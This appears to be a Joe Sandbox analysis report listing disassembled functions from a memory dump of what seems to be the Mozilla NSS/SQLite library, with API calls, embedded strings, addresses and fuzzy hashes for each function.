Opcode ID: 7f720350263b342a041b7d2ae3a4ed76665f160bd2f34ba5cefc27872817462f
Instruction ID: 681b7aeb5f430fe867485bc7599c717d3cfb1e23e302fc388df6404fb078efdf
Opcode Fuzzy Hash: 7f720350263b342a041b7d2ae3a4ed76665f160bd2f34ba5cefc27872817462f
Instruction Fuzzy Hash: E5516C72B016494FC718CDADDD926EAB7DAABA4310F48C23AE442CB785D638E906C751

Function 6C840F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C841027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8410B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C841353

Strings

%02x, xrefs: 6C8412F6
-- , xrefs: 6C840FF5
zeroblob(%d), xrefs: 6C841223
'%.*q', xrefs: 6C841217, 6C841292
NULL, xrefs: 6C84119E
%lld, xrefs: 6C84114B
$, xrefs: 6C8412A0

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 4c3c39a90c14b2e6307d597470d2a5f48bb13c0b354b101d613ceff82853ead3
Instruction ID: d3061a1e66b2eadc918e1518c58445a908042a25074db100b96c1343e0efc227
Opcode Fuzzy Hash: 4c3c39a90c14b2e6307d597470d2a5f48bb13c0b354b101d613ceff82853ead3
Instruction Fuzzy Hash: C5E1B071A08344DFD724CF18C680A6BBBF1AF85348F448D2DE98587B51E775E859CB82

Function 6C848FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C848FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8490DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C849118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C84915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8491C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C849209

Strings

UUUU, xrefs: 6C849255
3333, xrefs: 6C84925E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 6d8ca38df0b9cbae2f54ccab00ac5c9cdf48f635ff2e0c509141a5fc82a4d6cc
Instruction ID: c4411d26438112cfc2024d85e3dfef920f933b84509d7860b721a11a6e08c168
Opcode Fuzzy Hash: 6d8ca38df0b9cbae2f54ccab00ac5c9cdf48f635ff2e0c509141a5fc82a4d6cc
Instruction Fuzzy Hash: CBA19172E001199BDB24CB68CE91B9EB7B5BF88324F098579D915A7741E736AC01CBD0

Function 6C700FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C70103E
EnterCriticalSection.KERNEL32(?), ref: 6C701139
LeaveCriticalSection.KERNEL32(?), ref: 6C701190
sqlite3_free.NSS3(00000000), ref: 6C701227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C70126E
sqlite3_free.NSS3(?), ref: 6C70127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C701267
winAccess, xrefs: 6C70129B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: bad670f76c0f15e98ef159babe40eb2dc7dd27e38ffecda068c7806a68a43e9c
Instruction ID: 293b713447c27e9020d90465aaacffe91bdc2ea968b8dc026b4912c6bafc8eb4
Opcode Fuzzy Hash: bad670f76c0f15e98ef159babe40eb2dc7dd27e38ffecda068c7806a68a43e9c
Instruction Fuzzy Hash: 5971E7B17052019BEB289F64DE85A6A33F6FB8636CF144639E91187A81DB30ED05C7D2

Function 6C70AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?), ref: 6C70B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B090
sqlite3_free.NSS3(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B0A2
CloseHandle.KERNEL32(?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?,?,?), ref: 6C70B100
sqlite3_free.NSS3(?,?,00000002,?,6C82CF46,?,6C6FCDBD,?,6C82BF31,?,?,?,?,?,?,?), ref: 6C70B115
sqlite3_free.NSS3(?,?,?,?,?,?,6C82CF46,?,6C6FCDBD,?,6C82BF31), ref: 6C70B12D

Part of subcall function 6C6F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C70C6FD,?,?,?,?,6C75F965,00000000), ref: 6C6F9F0E
Part of subcall function 6C6F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C75F965,00000000), ref: 6C6F9F5D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 7a199947758b6ee802323609e6d687380a98c7340936ea921d420658c2e97c7b
Instruction ID: 5af47b9488c326e009b9ec70981153c904fce35831893aba0eb7e7923da86eca
Opcode Fuzzy Hash: 7a199947758b6ee802323609e6d687380a98c7340936ea921d420658c2e97c7b
Instruction Fuzzy Hash: 5791BEB0B042068FDB14CF64CA85A6BB7F2BF85318F144A3DE41697A51EB30F945CB91

Function 6C888D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D14E4,6C83CC70), ref: 6C888D47
PR_GetCurrentThread.NSS3 ref: 6C888D98

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C888E7B
htons.WSOCK32(?), ref: 6C888EDB
PR_GetCurrentThread.NSS3 ref: 6C888F99
PR_GetCurrentThread.NSS3 ref: 6C88910A

Strings

%u.%u.%u.%u, xrefs: 6C888E74

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 6cc04f0580245b3429808e9a7f95a93604149751f64e58e6fb5c2334f706d40b
Instruction ID: 13eda4025349f22d19ab122632f360c34bbd1fb9b9e543dd0bcd0b3490586bf2
Opcode Fuzzy Hash: 6cc04f0580245b3429808e9a7f95a93604149751f64e58e6fb5c2334f706d40b
Instruction Fuzzy Hash: BB02CA3590B2558FDB34CF19C6A836ABBA3EF42308F198A9AC8914FF91C335D905C790

Function 6C82A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C84C3A2,?,?,00000000,00000000), ref: 6C82A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C82A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82A738

Strings

database corruption, xrefs: 6C82A6D4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C82A6CA
%s at line %d of [%.10s], xrefs: 6C82A6D9

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: f99dde1eb9ca7336060323ff729232a8bef724c9e841aac889b6cf0b8b5967df
Instruction ID: 1369a8802d6856b157e90b149c8a9df970ebef347b1d509f4c97c8cf35ee7720
Opcode Fuzzy Hash: f99dde1eb9ca7336060323ff729232a8bef724c9e841aac889b6cf0b8b5967df
Instruction Fuzzy Hash: EB91D2706087018BC724CF68C684AABB7E1BF48314F554E6DE8968BB91E738EC85C7C1

Function 6C8068E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C8068FC
PR_EnterMonitor.NSS3 ref: 6C806924

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

PR_EnterMonitor.NSS3 ref: 6C80693E
TlsGetValue.KERNEL32 ref: 6C806977
TlsGetValue.KERNEL32 ref: 6C8069B8
PR_ExitMonitor.NSS3 ref: 6C806B1E
PR_ExitMonitor.NSS3 ref: 6C806B39
TlsGetValue.KERNEL32 ref: 6C806B62

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: e88f49e6cad709050117c0cdfa43e788d5de0cc2c9d67d3b22d948bcfc154498
Instruction ID: 27e6de941338100d11bbf46d37414e83c61fc1e96b32b96e8ebe58af8ff0c1e3
Opcode Fuzzy Hash: e88f49e6cad709050117c0cdfa43e788d5de0cc2c9d67d3b22d948bcfc154498
Instruction Fuzzy Hash: 28918FB4758104DBEB60DF2DCA9055D7BA2FB83308F618A69CC44DBA19C731E9C1CB81

Function 6C70EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C70F957, 6C70F9BA
%s %T already exists, xrefs: 6C70FAC8
sqlite_master, xrefs: 6C70F0AB, 6C70F2DA, 6C70F757, 6C70F93E
view, xrefs: 6C70F061, 6C70F071, 6C70FAB7
authorizer malfunction, xrefs: 6C70F95C, 6C70F9BF, 6C70FA5E, 6C70FA8B
there is already an index named %s, xrefs: 6C70F9D7
temporary table name must be unqualified, xrefs: 6C70F734
sqlite_temp_master, xrefs: 6C70F0A6, 6C70F2D5
table, xrefs: 6C70F05C, 6C70FABC, 6C70FAC7

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 76e009ddc640efe95a9da53e3de27944880fe2cf4634eea1bc57d5ff7e35e0f4
Instruction ID: 36cacd06168c5a3ef6da7817552fd7c32e0709e12257e05e4555aed7ca4ad2fa
Opcode Fuzzy Hash: 76e009ddc640efe95a9da53e3de27944880fe2cf4634eea1bc57d5ff7e35e0f4
Instruction Fuzzy Hash: CA72C0B0E042058FDB14CF69C684BAABBF1FF49308F1481ADD8159BB92D775E846CB94

Function 6C7909A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7906A0: TlsGetValue.KERNEL32 ref: 6C7906C2
Part of subcall function 6C7906A0: EnterCriticalSection.KERNEL32(?), ref: 6C7906D6
Part of subcall function 6C7906A0: PR_Unlock.NSS3 ref: 6C7906EB

memcmp.VCRUNTIME140(00000000,6C779B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C779B8A,00000000,k-wl), ref: 6C7909D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C779B8A,00000000,k-wl), ref: 6C7909F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C779B8A,00000000,k-wl), ref: 6C790A1C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C779B8A,00000000,k-wl), ref: 6C790A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C779B8A,00000000,k-wl), ref: 6C790A48

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: eb3e331830576ea5f742d70bcf65c03b4b7cd30e833104d01e8bc96ccdc52a04
Instruction ID: 7a5a639e1a166e19d10f7e6c3439402f317c5b44a568be353abbea1c12328dee
Opcode Fuzzy Hash: eb3e331830576ea5f742d70bcf65c03b4b7cd30e833104d01e8bc96ccdc52a04
Instruction Fuzzy Hash: 0B02D0B2E102059FEB008F65EE45BAB77B9FF48318F140139EA05A7B52E731E945CB91

Function 6C806BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C806C2C

Part of subcall function 6C806E90: PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C806BF7), ref: 6C806EB6
Part of subcall function 6C806E90: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C8AFC0A,6C806BF7), ref: 6C806ECD
Part of subcall function 6C806E90: ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C806EE0
Part of subcall function 6C806E90: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C806EFC
Part of subcall function 6C806E90: PR_NewLock.NSS3 ref: 6C806F04
Part of subcall function 6C806E90: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C806F18
Part of subcall function 6C806E90: PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C806BF7), ref: 6C806F30
Part of subcall function 6C806E90: PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C806BF7), ref: 6C806F54

TlsGetValue.KERNEL32 ref: 6C806D93
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C806BF7), ref: 6C806FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C806BF7), ref: 6C806FFD

Strings

NSS_SSL_CBC_RANDOM_IV, xrefs: 6C806FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C806FDB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Secure$Value$Lockfclosefopenftellfwrite
String ID: NSS_SSL_CBC_RANDOM_IV$NSS_SSL_REQUIRE_SAFE_NEGOTIATION
API String ID: 3032383292-3007362596
Opcode ID: 7d67746bfa8757fbdd3072f14ad939de5f9f47ea9431cd44a2980cd7cea7ab40
Instruction ID: 47a52e0bbfacd8068a3aca2657c89b37d7f90a8962658516b24d5b364918fe87
Opcode Fuzzy Hash: 7d67746bfa8757fbdd3072f14ad939de5f9f47ea9431cd44a2980cd7cea7ab40
Instruction Fuzzy Hash: 57711E707886598BDB388F3CCBAA52437B1A75730DF500A2ADC53CAB91D7387482C792

Function 6C750820 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6C7511D2

Strings

not authorized, xrefs: 6C75175E, 6C751763
authorizer malfunction, xrefs: 6C751BD2
@, xrefs: 6C750B17
rows deleted, xrefs: 6C7517D2

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset
String ID: @$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-4041583037
Opcode ID: 926b64b11ed07193d4e0bbed7e19210b27cc15b4da9c47da2d8c258a95f37454
Instruction ID: de043435ceadefc6da38f30168ed6976779f793de48659f01f29f782f8ae5acb
Opcode Fuzzy Hash: 926b64b11ed07193d4e0bbed7e19210b27cc15b4da9c47da2d8c258a95f37454
Instruction Fuzzy Hash: D3D28C70E04249CFDB14CFA9C584B9DBBF2BF49308F688169D415ABB51DB71E866CB80

Function 6C81C9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6C81CEA5

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: NormalizeTime
String ID:
API String ID: 1467309002-0
Opcode ID: b319cd4091d5145137005d318b92b7e4266a879cac7800e9c629eced226213e1
Instruction ID: 2fba6358d80bc90b5fc82ab5ea93b610444ec50dea2b577a1f59ed3b254efee3
Opcode Fuzzy Hash: b319cd4091d5145137005d318b92b7e4266a879cac7800e9c629eced226213e1
Instruction Fuzzy Hash: 1D7172719097418FC314DF28C54062ABBE1FF89318F258A2EE469C7BA1E730D955CB91

Function 6C88CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C88D086
PR_Malloc.NSS3(00000001), ref: 6C88D0B9
PR_Free.NSS3(?), ref: 6C88D138

Strings

>, xrefs: 6C88CF5B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
